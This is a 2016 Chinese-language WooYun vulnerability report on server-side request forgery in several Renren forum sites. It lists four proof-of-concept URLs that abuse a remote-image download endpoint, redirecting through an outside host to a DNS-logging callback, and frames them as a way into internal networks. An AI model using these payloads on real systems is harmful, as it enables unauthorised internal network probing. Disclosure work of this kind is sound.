人人网几处站点存在SSRF漏洞

编号228780
Urlhttp://www.wooyun.org/bug.php?action=view&id=228780
漏洞状态漏洞已经通知厂商但是厂商忽略漏洞
漏洞标题人人网几处站点存在SSRF漏洞
漏洞类型未授权访问/权限绕过
厂商人人网
白帽子jeary
提交日期2016-07-13 17:24:00
公开日期2016-07-13 17:30:00
修复时间(not set)
确认时间0000-00-00 00:00:00
Confirm Spend-1
漏洞标签未授权访问
关注数0
收藏数0
白帽评级
白帽自评rank8
厂商评级
厂商评rank0
漏洞简介
用ssrf渗透内网需要技术呀。。
漏洞细节

参考:http://wooyun.org/bugs/wooyun-2010-0215779
看猪哥的文档说,可以使用ssrf进行内网渗透,利用跳转来进行其他协议探测是一个不错的姿势。

http://war.gamebbs.renren.com/forum.php?mod=ajax&action=downremoteimg&message=[img]http://localhost-9200.com/302.php?url=http://renren.22e642.dnslog.info/?data=helo.jpg[/img]
http://kd.gamebbs.renren.com/forum.php?mod=ajax&action=downremoteimg&message=[img]http://localhost-9200.com/302.php?url=http://renren4.22e642.dnslog.info/?data=helo.jpg[/img]
http://fans.renren.com/forum.php?mod=ajax&action=downremoteimg&message=[img]http://localhost-9200.com/302.php?url=http://renren.22e642.dnslog.info/?data=helo.jpg[/img]
http://gamebbs.renren.com/forum.php?mod=ajax&action=downremoteimg&message=[img]http://localhost-9200.com/302.php?url=http://renren.22e642.dnslog.info/?data=helo.jpg[/img]


POC


ssrf.jpg

修复方案

禁止访问。

状态信息 2016-07-13: 细节已通知厂商并且等待厂商处理中
2016-07-13: 厂商已经主动忽略漏洞,细节向公众公开
厂商回复忽略
回应信息危害等级:无影响厂商忽略忽略时间:2016-07-13 17:30